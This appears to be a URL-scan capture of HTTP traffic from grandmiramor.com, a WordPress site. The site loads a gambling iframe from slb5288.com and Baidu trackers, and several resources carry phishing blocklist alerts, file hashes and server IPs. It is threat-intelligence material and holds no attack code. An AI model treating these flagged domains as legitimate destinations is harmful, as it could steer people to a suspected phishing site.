content-length: 15660
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Tue, 22 Nov 2022 22:17:43 GMT
expires: Wed, 22 Nov 2023 22:17:43 GMT
cache-control: public, max-age=31536000
age: 147328
last-modified: Tue, 19 Apr 2022 18:42:42 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 15660, version 1.0\012- data
Size:   15660
Md5:    d7b0b953a50fddaa88089b5b787cf719
Sha1:   2f85bc568b27659a3d6452f58f9fd7678450326d
Sha256: e79c1c1a140e6afb861074c70392db54cc65a06050de2a69162ab94eb95b0516
                                        
GET /s/lato/v23/S6uyw4BMUTPHjx4wXg.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://grandmiramor.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
216.58.207.195
HTTP/2 200 OK
content-type: font/woff2
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 23580
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Tue, 22 Nov 2022 17:10:21 GMT
expires: Wed, 22 Nov 2023 17:10:21 GMT
cache-control: public, max-age=31536000
age: 165770
last-modified: Tue, 26 Apr 2022 15:48:56 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 23580, version 1.0\012- data
Size:   23580
Md5:    e1b3b5908c9cf23dfb2b9c52b9a023ab
Sha1:   fcd4136085f2a03481d9958cc6793a5ed98e714c
Sha256: 918b7dc3e2e2d015c16ce08b57bcb64d2253bafc1707658f361e72865498e537
                                        
                                            GET /images/core/emoji/14.0.0/svg/2764.svg HTTP/1.1 
Host: s.w.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         192.0.77.48
HTTP/2 200 OK
content-type: image/svg+xml
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:11 GMT
content-length: 368
last-modified: Tue, 12 Apr 2022 03:47:50 GMT
x-frame-options: SAMEORIGIN
expires: Thu, 31 Dec 2037 23:55:55 GMT
cache-control: max-age=315360000
access-control-allow-methods: GET, HEAD
access-control-allow-origin: *
x-nc: HIT arn 2
x-content-type-options: nosniff
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  SVG Scalable Vector Graphics image\012- , ASCII text, with very long lines (368), with no line terminators
Size:   368
Md5:    0483f2b648dcc986d01385062052ae1c
Sha1:   61bd815f1497863265a76d92623042835e5e7fe2
Sha256: 09a743ee0c32ca57c9be64b13b29c396310d1dd309cb4d7d3be722e47db95f27
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Thu, 24 Nov 2022 15:13:11 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /go/ob.html HTTP/1.1 
Host: www.slb5288.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         
                                         103.35.116.217
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Server: nginx
Date: Thu, 24 Nov 2022 15:13:11 GMT
Last-Modified: Thu, 24 Nov 2022 11:05:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
ETag: W/"637f5017-def"
Content-Encoding: gzip


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, Unicode text, UTF-8 text
Size:   1418
Md5:    112c461e917662fdfd85f536100a6b15
Sha1:   ac4efcd4b63d136bdc2a295d842402be72e6b8e9
Sha256: 8574ca49c5cb26d157929321f55bb7482e5d98c84b300d01b04ffe6c8eff2908
                                        
                                            GET /wp-content/themes/educenter/assets/library/fontawesome/webfonts/fa-solid-900.woff2 HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Connection: keep-alive
Referer: https://grandmiramor.com/wp-content/themes/educenter/assets/library/fontawesome/css/all.min.css?ver=6.1.1
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: font/woff2
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:11 GMT
content-length: 75728
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
etag: "6360d7e9-127d0"
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 75728, version 330.32636\012- data
Size:   75728
Md5:    44d537ab79f921fde5a28b2c1636f397
Sha1:   b2879f9e1d0985a96842bf7f55a2b2cc4c636d04
Sha256: 3d1080625d3030e88357b3ac9aa377dcec23f1b529c4ad03f7a9a435ccae04be

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /hm.js?14c80326baa455e60c7d9ecfd2eeb6be HTTP/1.1 
Host: hm.baidu.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         103.235.46.191
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Cache-Control: max-age=0, must-revalidate
Content-Encoding: gzip
Content-Length: 11259
Date: Thu, 24 Nov 2022 15:13:11 GMT
Etag: 5fe6408f9519c25bd0bd812a6254d5a0
P3p: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Server: apache
Set-Cookie: HMACCOUNT=ABC3961F7B7F395C; Path=/; Domain=hm.baidu.com; Expires=Sun, 18 Jan 2038 00:00:00 GMT
Strict-Transport-Security: max-age=172800


--- Additional Info ---
Magic:  ASCII text, with very long lines (621)
Size:   11259
Md5:    3feae75a60dcfdf799c2eef8f8d45afe
Sha1:   d2602ffb1c494fdf3c8e4bdb156f72918e1cb0a0
Sha256: f2b06c7d5e4adefe98003c5cc8f10cc1158c696dad9b2de092a1e50d4a3609e6
                                        
                                            GET /hm.js?156b2b1f9196a3c767b14e29e3c17dfb HTTP/1.1 
Host: hm.baidu.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         103.235.46.191
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Cache-Control: max-age=0, must-revalidate
Content-Encoding: gzip
Content-Length: 11269
Date: Thu, 24 Nov 2022 15:13:11 GMT
Etag: 16fff19e42862c40f36c31a0cb0298be
P3p: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Server: apache
Set-Cookie: HMACCOUNT=AA234141C1840204; Path=/; Domain=hm.baidu.com; Expires=Sun, 18 Jan 2038 00:00:00 GMT
Strict-Transport-Security: max-age=172800


--- Additional Info ---
Magic:  ASCII text, with very long lines (631)
Size:   11269
Md5:    c22df1d02e9e58c2d2b995006e038d04
Sha1:   db856625e561eb34fac63688426150dd2792e579
Sha256: 072fe236430ea9a34016b61ab1132661186ed10a30f76bc5a5bcd2bee643e6cd
                                        
                                            GET /go/css/min.css HTTP/1.1 
Host: www.slb5288.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.slb5288.com/go/ob.html
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         103.35.116.217
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Thu, 24 Nov 2022 15:13:11 GMT
Last-Modified: Sun, 16 Oct 2022 05:46:45 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
ETag: W/"634b9ac5-48eb"
Content-Encoding: gzip


--- Additional Info ---
Magic:  troff or preprocessor input, ASCII text
Size:   2956
Md5:    43d31051a45ed743997d73df9f01c25b
Sha1:   098ac69df747ab9a4726a34fd7e8adc5b75a39c0
Sha256: d93a27383439b61c2b1d165f333b4f1117fd5f51221b6492ea1fcc234a01f1c6
                                        
                                            GET /hm.gif?cc=1&ck=1&cl=24-bit&ds=1280x1024&vl=939&et=0&ja=0&ln=en-us&lo=0&rnd=1829163586&si=14c80326baa455e60c7d9ecfd2eeb6be&v=1.3.0&lv=1&sn=60806&r=0&ww=1280&u=https%3A%2F%2Fgrandmiramor.com%2F&tt=%E4%B8%96%E7%95%8C%E6%9D%AF%E6%8A%95%E6%B3%A8%E5%AE%98%E7%BD%91(%E4%B8%AD%E5%9B%BD)%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8 HTTP/1.1 
Host: hm.baidu.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         103.235.46.191
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Cache-Control: private, max-age=0, no-cache
Content-Length: 43
Date: Thu, 24 Nov 2022 15:13:11 GMT
P3p: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Pragma: no-cache
Server: apache
Set-Cookie: HMACCOUNT=338E164357663804; Path=/; Domain=hm.baidu.com; Expires=Sun, 18 Jan 2038 00:00:00 GMT
Strict-Transport-Security: max-age=172800
X-Content-Type-Options: nosniff


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1\012- data
Size:   43
Md5:    ad4b0f606e0f8465bc4c4c170b37e1a3
Sha1:   50b30fd5f87c85fe5cba2635cb83316ca71250d7
Sha256: cf4724b2f736ed1a0ae6bc28f1ead963d9cd2c1fd87b6ef32e7799fc1c5c8bda
                                        
                                            GET /hm.gif?cc=1&ck=1&cl=24-bit&ds=1280x1024&vl=939&et=0&ja=0&ln=en-us&lo=0&rnd=63807918&si=156b2b1f9196a3c767b14e29e3c17dfb&v=1.3.0&lv=1&sn=60806&r=0&ww=1280&u=https%3A%2F%2Fgrandmiramor.com%2F&tt=%E4%B8%96%E7%95%8C%E6%9D%AF%E6%8A%95%E6%B3%A8%E5%AE%98%E7%BD%91(%E4%B8%AD%E5%9B%BD)%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8 HTTP/1.1 
Host: hm.baidu.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         103.235.46.191
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Cache-Control: private, max-age=0, no-cache
Content-Length: 43
Date: Thu, 24 Nov 2022 15:13:11 GMT
P3p: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Pragma: no-cache
Server: apache
Set-Cookie: HMACCOUNT=7C4E50C84E7C018A; Path=/; Domain=hm.baidu.com; Expires=Sun, 18 Jan 2038 00:00:00 GMT
Strict-Transport-Security: max-age=172800
X-Content-Type-Options: nosniff


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1\012- data
Size:   43
Md5:    ad4b0f606e0f8465bc4c4c170b37e1a3
Sha1:   50b30fd5f87c85fe5cba2635cb83316ca71250d7
Sha256: cf4724b2f736ed1a0ae6bc28f1ead963d9cd2c1fd87b6ef32e7799fc1c5c8bda
                                        
                                            GET /go/images/icon01.png HTTP/1.1 
Host: www.slb5288.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.slb5288.com/go/css/min.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         103.35.116.217
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Thu, 24 Nov 2022 15:13:12 GMT
Content-Length: 450
Last-Modified: Fri, 04 Jun 2021 09:15:34 GMT
Connection: keep-alive
ETag: "60b9ef36-1c2"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image data, 20 x 20, 8-bit colormap, non-interlaced\012- data
Size:   450
Md5:    6df3b8ce3e08104b9ec52418b934319e
Sha1:   4cee4b27829f666ff918140a5d340a51ff8cdc99
Sha256: 296ccae6f63f1686815968e7a5a11be031168f91b8f1cb37ed181a0a3ce50196
                                        
                                            GET /go/images/ob.svg HTTP/1.1 
Host: www.slb5288.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.slb5288.com/go/css/min.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         103.35.116.217
HTTP/1.1 200 OK
Content-Type: image/svg+xml
                                        
Server: nginx
Date: Thu, 24 Nov 2022 15:13:12 GMT
Content-Length: 29784
Last-Modified: Wed, 09 Mar 2022 16:43:27 GMT
Connection: keep-alive
ETag: "6228d92f-7458"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  SVG Scalable Vector Graphics image\012- XML 1.0 document text\012- XML document text\012- HTML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (14296)
Size:   29784
Md5:    465c91a62aca28e28d2e1c2117ab004d
Sha1:   3f3525fe144890a2ca964a7df13c9228a3c86e9c
Sha256: e6ef5e7770544e9dace3205928f4b6f3af911e09a71c47a571a2610d8fd5bb3b
                                        
                                            GET /wp-includes/images/w-logo-blue-white-bg.png HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://grandmiramor.com/
Connection: keep-alive
Cookie: Hm_lvt_14c80326baa455e60c7d9ecfd2eeb6be=1669302791; Hm_lpvt_14c80326baa455e60c7d9ecfd2eeb6be=1669302791; Hm_lvt_156b2b1f9196a3c767b14e29e3c17dfb=1669302791; Hm_lpvt_156b2b1f9196a3c767b14e29e3c17dfb=1669302791
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: image/png
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:12 GMT
content-length: 4119
last-modified: Tue, 01 Nov 2022 08:14:35 GMT
etag: "6360d56b-1017"
expires: Sat, 24 Dec 2022 15:13:12 GMT
cache-control: max-age=2592000
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced\012- data
Size:   4119
Md5:    000bf649cc8f6bf27cfb04d1bcdcd3c7
Sha1:   d73d2f6d74ec6cdcbae07955592962e77d8ae814
Sha256: 6bdb369337ac2496761c6f063bffea0aa6a91d4662279c399071a468251f51f0
                                        
                                            GET /go/images/1614077699664025.png HTTP/1.1 
Host: www.slb5288.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.slb5288.com/go/css/min.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         103.35.116.217
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Thu, 24 Nov 2022 15:13:12 GMT
Content-Length: 7874
Last-Modified: Fri, 04 Jun 2021 09:37:36 GMT
Connection: keep-alive
ETag: "60b9f460-1ec2"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image data, 186 x 100, 8-bit/color RGBA, non-interlaced\012- data
Size:   7874
Md5:    7c5d462fbb022452c530aa98a278e595
Sha1:   f86a4bbca9ebecb5c868e20ead846b13f9df09f7
Sha256: 6fc74ddfec00da7f7e3a16e8d28b8c233faa3a04eee6a88ce4621f6d7d12c094
                                        
                                            GET /go/images/1614077820980163.png HTTP/1.1 
Host: www.slb5288.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.slb5288.com/go/css/min.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         103.35.116.217
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Thu, 24 Nov 2022 15:13:12 GMT
Content-Length: 32745
Last-Modified: Fri, 04 Jun 2021 09:37:56 GMT
Connection: keep-alive
ETag: "60b9f474-7fe9"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image data, 190 x 100, 8-bit/color RGBA, non-interlaced\012- data
Size:   32745
Md5:    63690442826dcd3544e0a50c3244b884
Sha1:   b3830948cc7b69b2734a4b2ecfb0c0b100630740
Sha256: ea93c09b5bbc174fcbb3d5ed6813434e0bb0a68ca86452023c1984f2f809afee
                                        
                                            GET /wp-content/themes/educenter/assets/library/sticky/jquery.sticky.js?ver=1 HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: application/javascript
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
vary: Accept-Encoding
etag: W/"6360d7e9-2765"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   10202
Md5:    6e1e6290cdded687c430f180c3a8f42f
Sha1:   b9c76bcabab7fff5d31092e95ab1b478b5a61a33
Sha256: b74024b26f63432757b69c4a13724bc50e9e10858999cce687d0328deed68253
                                        
                                            GET /go/images/1614077771187432.png HTTP/1.1 
Host: www.slb5288.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.slb5288.com/go/css/min.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         103.35.116.217
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Thu, 24 Nov 2022 15:13:12 GMT
Content-Length: 5530
Last-Modified: Fri, 04 Jun 2021 09:37:48 GMT
Connection: keep-alive
ETag: "60b9f46c-159a"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image data, 100 x 100, 8-bit/color RGBA, non-interlaced\012- data
Size:   5530
Md5:    ae8306606526424b77fd4ea4219226c5
Sha1:   afe333864b9dd1290aa1ab21a517cf8ca922695d
Sha256: 3a4d8b2face6ab45c9409c7b49bc5e930f3210237136d12d8d89397d090cbc1e
                                        
                                            GET /go/images/1614077789259639.png HTTP/1.1 
Host: www.slb5288.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.slb5288.com/go/css/min.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         103.35.116.217
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Thu, 24 Nov 2022 15:13:12 GMT
Content-Length: 3775
Last-Modified: Fri, 04 Jun 2021 09:37:52 GMT
Connection: keep-alive
ETag: "60b9f470-ebf"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image data, 100 x 100, 8-bit/color RGBA, non-interlaced\012- data
Size:   3775
Md5:    5a3e9e46aae819564c16d50873adb017
Sha1:   b1f97fb9637244e7c4a1feb0385ac6c4e82246b9
Sha256: 52c52d983997dfadd3579e7a500316b21eb6cc65bc798aec5951291f8d0a6f49
                                        
                                            GET /go/images/1614077889968827.png HTTP/1.1 
Host: www.slb5288.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.slb5288.com/go/css/min.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         103.35.116.217
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Thu, 24 Nov 2022 15:13:12 GMT
Content-Length: 13011
Last-Modified: Fri, 04 Jun 2021 09:38:08 GMT
Connection: keep-alive
ETag: "60b9f480-32d3"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image data, 216 x 100, 8-bit/color RGBA, non-interlaced\012- data
Size:   13011
Md5:    03ac0516b399dda3fbefb3bebe2b5faf
Sha1:   00d4d629cd65fadce5b8eb1e7f150dad13cfe673
Sha256: 38691bc92f3abcebf79a98ad22da7ef39b8a93c29b5daff6ba3ec9fa1d5e4f8e
                                        
                                            GET /wp-content/themes/educenter/assets/library/waypoints/jquery.waypoints.min.js?ver=4.0.0 HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: application/javascript
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 01 Nov 2022 08:25:13 GMT
vary: Accept-Encoding
etag: W/"6360d7e9-2281"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   27834
Md5:    c0ca259aba1c390ca168f6fd36494246
Sha1:   30c7e7fe69d93c03c70ca02ab28b916f8c1019db
Sha256: 7e0781d07aabbf0fd2f124dc9e77805453e030b07acda3195eb3de9abfa36c67

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-includes/css/dist/block-library/style.min.css?ver=6.1.1 HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://grandmiramor.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         156.240.38.111
HTTP/2 200 OK
content-type: text/css
                                        
server: nginx
date: Thu, 24 Nov 2022 15:13:09 GMT
last-modified: Tue, 15 Nov 2022 23:27:06 GMT
vary: Accept-Encoding
etag: W/"6374204a-172a9"
expires: Fri, 25 Nov 2022 03:13:09 GMT
cache-control: max-age=43200
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   20084
Md5:    9a5103b84dd4c30bdcf5e4b4a8332374
Sha1:   48316cf6c0453b11f8cad9f032c4bd4a771ee3a1
Sha256: 100888c6a8799a494093fb526ac4f1d785618b2149f760cbf23c0aa446b9b6e8
                                        
                                            GET /go/images/1614077927427474.png HTTP/1.1 
Host: www.slb5288.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.slb5288.com/go/css/min.css
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

                                         
                                         103.35.116.217
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Thu, 24 Nov 2022 15:13:12 GMT
Content-Length: 12265
Last-Modified: Fri, 04 Jun 2021 09:38:14 GMT
Connection: keep-alive
ETag: "60b9f486-2fe9"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image data, 200 x 100, 8-bit/color RGBA, non-interlaced\012- data
Size:   12265
Md5:    59b21f41121bcd79543b7d214e1e0c6a
Sha1:   d52af2bfc77f53be4062e61e2c8df5d5edc81650
Sha256: 0bb4cfb25c280decd7caaaf8206d8a635fe1db790df7d51f781dd8b43e2613bb
                                        
                                            GET / HTTP/1.1 
Host: grandmiramor.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
